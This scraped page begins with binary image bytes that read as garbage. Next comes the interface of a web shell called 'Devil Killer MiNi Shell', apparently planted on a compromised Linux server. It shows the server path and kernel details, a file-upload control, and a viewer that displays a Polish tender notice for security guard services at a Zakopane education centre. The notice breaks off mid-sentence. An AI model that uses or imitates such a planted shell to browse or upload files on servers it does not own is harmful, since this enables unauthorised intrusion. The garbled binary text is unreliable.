JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/home/vmanager/www/common/web/tenders/20251114/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/self/root/home/vmanager/www/common/web/tenders/20251114/0053352501-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługa ochrony fizycznej obiektu, osób, mienia i terenu siedziby Zakopiańskiego Centrum Edukacji im. H. Modrzejewskiej <br/>przy ul. Kasprusie 35 a w Zakopanem </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">ZAKOPIAŃSKIE CENTRUM EDUKACJI IM.H. MODRZEJEWSKIEJ</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">ZCE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 491996884</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Kasprusie 35 A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Zakopane</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">34-500</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL219 - Nowotarski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi.zce@zakopane.eu</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">zce.zakopane.eu</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samorządowy zakład budżetowy</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Zakopiańskie Centrum Edukacji (ZCE) – zakład budżetowy Gminy Zakopane, zarządza lokalami użytkowymi oraz bazą edukacyjną, kulturalną, sportową i hotelową, udostępnianą według potrzeb mieszkańców. </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługa ochrony fizycznej obiektu, osób, mienia i terenu siedziby Zakopiańskiego Centrum Edukacji im. H. Modrzejewskiej <br/>przy ul. Kasprusie 35 a w Zakopanem </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-79040bd1-b030-4dd0-82f6-e832b5087f5e</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00533525</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-11-14</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00125044/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Usługę ochrony fizycznej obiektu, osób, mienia i terenu siedziby Zakopiańskiego Centrum Edukacji im. H. Modrzejewskiej przy ul. Kasprusie 35 a w Zakopanem”.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-79040bd1-b030-4dd0-82f6-e832b5087f5e <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.1.	W postępowaniu o udzielenie zamówienia publicznego komunikacja między Zamawiającym a wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl <br/>1.2.	Korzystanie z Platformy e-Zamówienia jest bezpłatne. <br/>1.3.	Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce „Centrum Pomocy”. <br/>1.4.	Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta na Platformie e-Zamówienia ani logowania. <br/>1.5.	Sposób sporządzenia dokumentów elektronicznych lub dokumentów elektronicznych będących kopią elektroniczną treści zapisanej w postaci papierowej (cyfrowe odwzorowania) musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych.<br/>1.6.	Dokumenty elektroniczne, o których mowa w § 2 ust. 1 rozporządzenia Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych, sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności, z uwzględnieniem rodzaju przekazywanych danych i przekazuje się jako załączniki. W przypadku formatów, o których mowa w art. 66 ust. 1 ustawy PZP, ww. regulacje nie będą miały bezpośredniego zastosowania. <br/>1.7.	Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy” na Platformie e-Zamówienia oraz zalogowania się na Platformie e-Zamówienia. Do korzystania z „Formularzy do komunikacji” służących do zadawania pytań dotyczących treści dokumentów zamówienia wystarczające jest posiadanie tzw. konta uproszczonego na Platformie e-Zamówienia.<br/>1.8.	Wszystkie wysłane i odebrane w postępowaniu przez wykonawcę wiadomości widoczne są po zalogowaniu w podglądzie postępowania w zakładce „Komunikacja”.<br/>1.9.	Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy plików przesyłanych jako załączniki do jednego formularza).<br/>1.10.	Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia.<br/>1.11.	W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy e-Zamówienia użytkownicy mogą skorzystać ze wsparcia technicznego dostępnego pod numerem telefonu 22 458 77 99 lub drogą elektroniczną poprzez formularz udostępniony na stronie internetowej https://ezamowienia.gov.pl w zakładce „Zgłoś problem”.<br/>1.12.	W szczególnie uzasadnionych przypadkach uniemożliwiających komunikację Wykonawcy i Zamawiającego za pośrednictwem Platformy e-Zamówienia, Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na adres e-mail: przetargi.zce@zakopane.eu (nie dotyczy składania ofert/wniosków o dopuszczenie do udziału w postępowaniu).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">INFORMACJA O PRZETWARZANIU DANYCH OSOBOWYCH<br/>Zgodnie z art. 13 ust. 1 i 2 RODO (Rozporządzenie Parlamentu Europejskiego i Rady (UE) 2016/679 z 27.04.2016 r.) informujemy:<br/>1. Administrator danych: Zakopiańskie Centrum Edukacji im. H. Modrzejewskiej, ul. Kasprusie 35a, 34-500 Zakopane<br/>2. Kontakt: ido@zakopane.eu<br/>3. Cel i podstawa przetwarzania: Pani/Pana dane przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w związku z postępowaniem o udzielenie zamówienia publicznego w trybie podstawowym z możliwością negocjacji.<br/>4. Odbiorcy danych: Osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania zgodnie z art. 74 Ustawy PZP.<br/>5. Okres przechowywania: Zgodnie z art. 78 ust. 1 Ustawy PZP - 4 lata od zakończenia postępowania, a jeżeli umowa trwa dłużej - przez cały czas trwania umowy.<br/>6. Obowiązek podania danych: Wymóg ustawowy wynikający z Ustawy PZP, związany z udziałem w postępowaniu.<br/>7. Zautomatyzowane podejmowanie decyzji: Nie będzie stosowane (art. 22 RODO).<br/>8. Przysługujące prawa:<br/><br/>Art. 15 RODO - prawo dostępu do danych (może wymagać sprecyzowania żądania)<br/>Art. 16 RODO - prawo do sprostowania danych (bez zmiany wyniku postępowania/umowy)<br/>Art. 18 RODO - prawo do ograniczenia przetwarzania (z zastrzeżeniami)<br/>Prawo wniesienia skargi do Prezesa UODO<br/><br/>9. Prawa, które NIE przysługują:<br/><br/>Prawo do usunięcia danych (art. 17 ust. 3 lit. b, d, e RODO)<br/>Prawo do przenoszenia danych (art. 20 RODO)<br/>Prawo sprzeciwu (art. 21 RODO) - podstawą przetwarzania jest art. 6 ust. 1 lit. c RODO<br/><br/>10. Organ nadzorczy: W przypadku skargi na niezgodne z RODO przetwarzanie danych - Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">INFORMACJA O PRZETWARZANIU DANYCH OSOBOWYCH<br/>Zgodnie z art. 13 ust. 1 i 2 RODO (Rozporządzenie Parlamentu Europejskiego i Rady (UE) 2016/679 z 27.04.2016 r.) informujemy:<br/>1. Administrator danych: Zakopiańskie Centrum Edukacji im. H. Modrzejewskiej, ul. Kasprusie 35a, 34-500 Zakopane<br/>2. Kontakt: ido@zakopane.eu<br/>3. Cel i podstawa przetwarzania: Pani/Pana dane przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w związku z postępowaniem o udzielenie zamówienia publicznego w trybie podstawowym z możliwością negocjacji.<br/>4. Odbiorcy danych: Osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania zgodnie z art. 74 Ustawy PZP.<br/>5. Okres przechowywania: Zgodnie z art. 78 ust. 1 Ustawy PZP - 4 lata od zakończenia postępowania, a jeżeli umowa trwa dłużej - przez cały czas trwania umowy.<br/>6. Obowiązek podania danych: Wymóg ustawowy wynikający z Ustawy PZP, związany z udziałem w postępowaniu.<br/>7. Zautomatyzowane podejmowanie decyzji: Nie będzie stosowane (art. 22 RODO).<br/>8. Przysługujące prawa:<br/><br/>Art. 15 RODO - prawo dostępu do danych (może wymagać sprecyzowania żądania)<br/>Art. 16 RODO - prawo do sprostowania danych (bez zmiany wyniku postępowania/umowy)<br/>Art. 18 RODO - prawo do ograniczenia przetwarzania (z zastrzeżeniami)<br/>Prawo wniesienia skargi do Prezesa UODO<br/><br/>9. Prawa, które NIE przysługują:<br/><br/>Prawo do usunięcia danych (art. 17 ust. 3 lit. b, d, e RODO)<br/>Prawo do przenoszenia danych (art. 20 RODO)<br/>Prawo sprzeciwu (art. 21 RODO) - podstawą przetwarzania jest art. 6 ust. 1 lit. c RODO<br/><br/>10. Organ nadzorczy: W przypadku skargi na niezgodne z RODO przetwarzanie danych - Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">1/ZCE-Ochrona/2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiot i cel zamówienia<br/><br/>Przedmiotem zamówienia jest usługa ochrony osób i mienia na terenie Zakopiańskiego Centrum Edukacji im. Heleny Modrzejewskiej (ZCE) przy ul. Kasprusie 35a w Zakopanem.<br/><br/>Celem jest zapewnienie bezpieczeństwa osób, ochrony mienia, utrzymanie porządku oraz szybkie reagowanie na zagrożenia.<br/><br/>2. Miejsce i czas świadczenia usługi<br/><br/>Usługa realizowana jest w budynku ZCE i na terenie przyległym, w szczególności przy wejściach, na drogach wewnętrznych, miejscach postojowych i w strefach technicznych.<br/><br/>Godziny świadczenia usługi:<br/>a) poniedziałek–piątek: 7:00–21:00,<br/>b) sobota–niedziela: 9:00–17:00.<br/><br/>W czasie urzędowania ZCE służbę pełni jedna osoba na posterunku stałym.<br/><br/>3. Organizacja usługi i nadzór<br/><br/>Wykonawca zapewnia stały zespół agentów ochrony.<br/><br/>Harmonogram pracy gwarantuje należny wypoczynek i pełną zdolność do pracy.<br/><br/>Wykonawca wyznacza dwóch koordynatorów odpowiedzialnych za bieżącą współpracę z Zamawiającym, znających w pełnym zakresie sprawy dotyczące obiektu.<br/><br/>Wykonawca zapewnia całodobowy nadzór operatorski (system „Active Guard” lub równoważny) nad bezpieczeństwem obiektu i pracą agentów oraz natychmiastową reakcję na sygnały alarmowe.<br/><br/>4. Standard realizacji usługi<br/><br/>Usługa jest wykonywana zgodnie z przepisami dotyczącymi ochrony osób i mienia, BHP, ochrony przeciwpożarowej, ochrony danych osobowych oraz wewnętrznymi zasadami porządku obowiązującymi w ZCE.<br/><br/>Wykonawca zapobiega przestępstwom i wykroczeniom przeciwko mieniu, przeciwdziała powstawaniu szkód oraz niedopuszcza do wstępu osób nieuprawnionych.<br/><br/>5. System nadzoru patrolowego<br/><br/>Wykonawca zapewnia system nadzoru patrolowego (system „Active Guard” lub równoważny), obejmujący co najmniej:<br/>a) rejestrację punktów kontrolnych w technologii zbliżeniowej, czasu i zdarzeń podczas obchodów,<br/>b) lokalizację urządzeń przenośnych i transmisję danych do centrum monitorowania,<br/>c) przycisk alarmowy do natychmiastowego wezwania pomocy,<br/>d) raporty z obchodów oraz powiadomienia o opóźnieniach i nieprawidłowościach,<br/>e) możliwość pracy w trybie offline z późniejszą synchronizacją danych,<br/>f) mechanizmy zapewniające integralność i bezpieczeństwo danych.<br/><br/>W ramach uruchomienia systemu Wykonawca:<br/>a) wyposaża agentów w urządzenia przenośne,<br/>b) rozmieszcza i opisuje punkty kontrolne,<br/>c) uzgadnia z Zamawiającym trasy i częstotliwość obchodów oraz zasady raportowania,<br/>d) konfiguruje konta i uprawnienia oraz zapewnia Zamawiającemu dostęp do podglądu i raportów.<br/><br/>6. Gotowość interwencyjna<br/><br/>Wykonawca utrzymuje całodobową gotowość patrolu interwencyjnego.<br/><br/>Czas dojazdu patrolu od chwili wezwania nie przekracza 10 minut.<br/><br/>Realizowane są podjazdy prewencyjno-kontrolne o zróżnicowanych porach.<br/><br/>7. Wyposażenie<br/>Wykonawca zapewnia w szczególności:<br/><br/>Radiotelefony (jeżeli funkcjonują co najmniej dwa oddalone posterunki).<br/><br/>Latarki ze stacjami ładowania.<br/><br/>W razie potrzeby: wykrywacze metalu i/lub urządzenie do badania stanu trzeźwości.<br/><br/>8. Zakres czynności pracowników ochrony<br/>Pracownicy ochrony w szczególności:<br/><br/>Zapewniają bezpieczeństwo pracowników ZCE, najemców, interesantów i gości.<br/><br/>Pełnią służbę na posterunku stałym przy wejściu głównym.<br/><br/>Wykonują obchody wewnątrz i na zewnątrz budynku w cyklach nieregularnych.<br/><br/>Monitorują strefy objęte telewizją dozorową i reagują na zdarzenia.<br/><br/>Nadzorują urządzenia i systemy ochrony przeciwpożarowej w zakresie wynikającym z procedur.<br/><br/>Udzielają informacji i kierują interesantów do sekretariatu ZCE lub właściwych najemców.<br/><br/>Zapewniają dostępność w zakresie wynikającym z obowiązków ochrony dla osób z niepełnosprawnościami.<br/><br/>Egzekwują przestrzeganie porządku, przepisów ppoż. i zasad obowiązujących w ZCE.<br/><br/>Wzywają osoby naruszające porządek do opuszczenia obiektu.<br/><br/>Kontrolują ruch osobowy i materiałowy, przeciwdziałając wynoszeniu składników majątkowych bez upoważnienia.<br/><br/>Niedopuszczają do wnoszenia do stref bezpieczeństwa urządzeń rejestrujących obraz lub dźwięk bez zezwolenia.<br/><br/>Przeciwdziałają zagrożeniom oraz działają w sytuacjach kryzysowych.<br/><br/>Zapobiegają napaściom, włamaniom, kradzieżom, dewastacji i aktom wandalizmu.<br/><br/>Podejmują interwencje w razie naruszenia zasad bezpieczeństwa.<br/><br/>Niezwłocznie wzywają patrol interwencyjny w razie potrzeby wzmocnienia ochrony.<br/><br/>Niezwłocznie informują upoważnionego pracownika ZCE o zagrożeniach i – na jego polecenie – zawiadamiają właściwe służby.<br/><br/>Współpracują z Policją i innymi służbami.<br/><br/>Utrzymują w sprawności urządzenia techniczne ochrony.<br/><br/>Po godzinach pracy biura i w dni wolne dokonują obchodu całego obiektu, sprawdzają zamknięcie okien i drzwi, zakręcenie zaworów wody, wyłączenie oświetlenia i urządzeń, brak osób nieuprawnionych, uzbrajają/rozbrajają system alarmowy oraz protokolarnie przekazują służbę.<br/><br/>Wydają i przyjmują klucze do pomieszczeń oraz je zabezpieczają.<br/><br/>Realizują bieżące zadania właściwe dla danego posterunku.<br/><br/>Obsługują recepcję w dni robocze w godzinach 7:00–21:00.<br/><br/>Obsługują interesantów i gości, w tym kierują do najemców po potwierdzeniu tożsamości.<br/><br/>Prowadzą „Książkę wejść i wyjść”.<br/><br/>Odbierają korespondencję i prasę adresowaną do ZCE i przekazują ją do sekretariatu.<br/><br/>Prowadzą dokumentację służby ochrony (w tym dziennik służby stanowiący własność Zamawiającego).<br/><br/>Przestrzegają dyscypliny pracy, utrzymują porządek na stanowisku i dbają o właściwą prezencję.<br/><br/>Przestrzegają przepisów BHP i ppoż.<br/><br/>9. Wymagania wobec pracowników Wykonawcy<br/><br/>Pracownicy są zatrudnieni na podstawie umowy o pracę w pełnym wymiarze czasu.<br/><br/>Posiadają aktualne przeszkolenie z udzielania pierwszej pomocy.<br/><br/>Przed rozpoczęciem usługi są przeszkoleni z BHP, ppoż. i ochrony danych osobowych.<br/><br/>Są zdolni do wykonywania powierzonych obowiązków.<br/><br/>Noszą czytelny identyfikator z wizerunkiem, imieniem i nazwiskiem, nazwą pracodawcy i funkcją.<br/><br/>Posiadają telefony umożliwiające kontakt z Zamawiającym i służbami.<br/><br/>Wykonawca zapewnia patrol interwencyjny zgodnie z pkt 1.1.6.<br/><br/>Pracownicy mają jednolite umundurowanie.<br/><br/>Nie byli prawomocnie skazani za przestępstwa przeciwko życiu, zdrowiu, mieniu, ochronie informacji oraz za przestępstwa związane z niedopełnieniem obowiązków pracowniczych.<br/><br/>Prezentują nienaganną prezencję, schludny wygląd i wysoki poziom kultury osobistej.<br/><br/>Znają podstawowe przepisy dotyczące ochrony osób i mienia, BHP, ppoż. i ochrony informacji.<br/><br/>10. Wymagania związane z obecnością małoletnich<br/><br/>Usługa jest realizowana w czynnej placówce edukacyjnej, w której stale przebywają małoletni.<br/><br/>Do pracy na obiekcie dopuszczane są wyłącznie osoby zweryfikowane zgodnie z przepisami o ochronie małoletnich, po przeprowadzeniu wymaganych sprawdzeń i uzyskaniu informacji z właściwych rejestrów; Wykonawca składa stosowne oświadczenie (załącznik do umowy).<br/><br/>Zamawiający może żądać potwierdzenia przeprowadzonych weryfikacji z poszanowaniem przepisów o ochronie danych osobowych.<br/><br/>Wykonawca zapewnia przestrzeganie standardów ochrony małoletnich obowiązujących w ZCE oraz u najemców placówek oświatowych.<br/><br/>11. Wymagania organizacyjne i komunikacja<br/><br/>Wykonawca zapoznaje pracowników z regulaminami i zarządzeniami ZCE, zasadami ochrony informacji i danych.<br/><br/>Odpowiada za właściwe wyposażenie pracowników i ich bezpieczeństwo podczas pracy.<br/><br/>Pracownicy stosują się do wewnętrznych przepisów Zamawiającego w zakresie niezbędnym do realizacji umowy.<br/><br/>W razie sytuacji nadzwyczajnej o charakterze epidemicznym Wykonawca zapewnia środki ochrony osobistej zgodne z wytycznymi właściwych organów.<br/><br/>Wykonawca z wyprzedzeniem, na piśmie, informuje o planowanej zmianie pracownika i przekazuje dokumenty nowej osoby najpóźniej w dniu rozpoczęcia pracy.<br/><br/>Wykonawca na bieżąco przedstawia Zamawiającemu propozycje usprawnienia ochrony.<br/><br/>12. Ubranie służbowe<br/>Pracownicy świadczą usługę w jednolitym stroju służbowym obejmującym koszulę z oznaczeniem Wykonawcy, spodnie w jednolitym kolorze oraz zakryte obuwie.<br/><br/>13. Raportowanie i dokumentacja<br/><br/>Wykonawca prowadzi dziennik służby i dokumentację potwierdzającą obchody oraz czynności ochronne, w tym raporty z systemu patrolowego.<br/><br/>Raporty okresowe przekazywane są w terminach wskazanych w umowie.<br/><br/>Po uruchomieniu systemu patrolowego sporządza się protokół odbioru funkcjonalnego potwierdzający spełnienie wymagań i poprawne działanie panelu dostępowego.<br/><br/>14. Ubezpieczenie i odpowiedzialność<br/><br/>Wykonawca posiada ubezpieczenie OC z tytułu prowadzonej działalności oraz ubezpieczenie NNW dla całego zespołu.<br/><br/>Wykonawca ponosi odpowiedzialność za szkody wyrządzone działaniem lub zaniechaniem własnym oraz osób, którymi się posługuje, na zasadach określonych w umowie i przepisach prawa.<br/><br/>15. Ochrona danych i poufność<br/><br/>Wykonawca przetwarza dane osobowe wyłącznie w zakresie niezbędnym do realizacji umowy i zgodnie z obowiązującymi przepisami.<br/><br/>Zapewnia 